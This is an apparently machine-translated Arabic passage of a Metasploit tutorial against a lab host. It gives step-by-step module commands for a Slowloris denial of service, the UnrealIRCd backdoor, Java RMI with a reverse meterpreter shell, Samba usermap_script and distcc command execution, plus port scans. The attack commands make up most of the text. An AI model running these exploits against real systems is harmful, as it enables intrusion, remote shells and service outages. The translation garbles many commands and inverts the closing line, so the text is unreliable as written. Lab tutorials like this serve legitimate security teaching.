كما رأيت أثناء عملية الفحص ، تم العثور على ثغرة أمنية بطيئة في DOS ، من أجل معرفة كيفية استغلالها فإنه يتبع الخطوات السابقة للبحث عن أداة مناسبة ، في هذه الحالة وحدة مساعدة بدلاً من استغلال:

البحث عن بطيئة

بمجرد العثور على أداة للهجوم ، قم بتشغيل:

استخدم المساعد/دوس/http/لوريس بطيئة

تعيين RHOST 192.168.0.184

ثم اكتب فقط:

يركض

ستلاحظ أثناء تنفيذ الهجوم ، أن خدمة http المستهدفة لن تكون متاحة ، وستستمر في التحميل:

بمجرد أن نوقف الهجوم بالضغط كنترول+ج سيكون الخادم متاحًا مرة أخرى:

استخدام Metasploit لاختراق خادم IRC:

يتم استخدام Internet Relay Chat على نطاق واسع في جميع أنحاء العالم ، كما قد تلاحظ خلال المراحل الأولى من الفحص ، فمن المحتمل أن تجد Metasploit خدمة IRC (Unreal IRCD) مصابة بأحد طروادة.

دعنا نكرر الخطوات للعثور على أداة لاختراقها:

البحث في ircd غير واقعي

# استخدم استغلال / unix / irc / unreal_ircd_3281_backdoor
# خيارات العرض
# مجموعة RHOST 192.168.0.184

ثم اركض:

استغلال

وكما ترون مرة أخرى ، لدينا جلسة شل داخل الهدف.

باستخدام Metasploit لتنفيذ تعليمات Java البرمجية الضارة:

# استخدم استغلال / multi / misc / java_rmi_server
# خيارات العرض

# مجموعة RHOST 192.168.0.184
# عرض الحمولات
# تعيين الحمولة java / meterpreter / reverse_tcp

تعيين LHOST 192.168.0.50

استغلال

استخدام Metasploit لاختراق ثغرة Samba Usermap Script:

سيتم حذف بعض الخطوات مثل البحث عن عمليات الاستغلال لتجنب برنامج تعليمي ضخم. لاستغلال هذه الثغرة الأمنية ، قم بما يلي:

# استخدم استغلال / multi / samba / usermap_script
# خيارات العرض

قم بتعيين IP الهدف واستغلاله عن طريق تشغيل:

# مجموعة RHOST 192.168.0.184
# استغلال

كما ترون ، حصلنا على قذيفة في هدفنا.

استخدام Metasploit لاستغلال تنفيذ أوامر DistCC Daemon:

هذا الضعف وأوضح هنا.

لبدء الجري:

استخدام استغلال/يونكس/متفرقات/distcc_exec

ثم اركض:

# مجموعة RHOST 192.168.0.184
# استغلال

كما ترى ، تمكنا من الوصول إلى الهدف مرة أخرى.

استخدام Metasploit لمسح المنافذ (طريقة إضافية بدون Nmap):

إجراء فحص TCP باستخدام Metasploit:

لإجراء فحص مختلف دون استخدام Nmap Metasploit ، يقدم Nmap Metasploit بدائل يمكنك العثور عليها عن طريق تشغيل:

البحث في الموانئ

لإجراء فحص tcp:

# استخدام الماسح / portscan / tcp
# مجموعة RHOST 192.168.0.184

لرؤية خيارات إضافية:

عرض الخيارات

اختر نطاق المنفذ الذي تريد مسحه ضوئيًا عن طريق التشغيل:

تعيين الموانئ 21-35

ثم قم بتشغيل الفحص بتنفيذ:

يركض

كما ترى ، تم العثور على المنافذ 22 و 25 و 23 و 21 مفتوحة.

إجراء فحص SYN باستخدام Metasploit:

لإجراء فحص SYN:

# استخدام المساعد / الماسح الضوئي / portscan / syn
# مجموعة RHOST 192.168.0.184
# مجموعة المنافذ 80
# يركض

كما ترون ، تم العثور على المنفذ 80 مفتوحًا.

استنتاج

Metasploit مثل سكين الجيش السويسري لديها العديد من الوظائف. آمل أن تكون قد وجدت هذا البرنامج التعليمي غير مفيد في Metasploit. استمر في اتباع LinuxHint للحصول على مزيد من النصائح والتحديثات حول Linux والشبكات.

instagram stories viewer

اقرأ أيضا:

ليست هناك تعليقات:

إرسال تعليق

to Top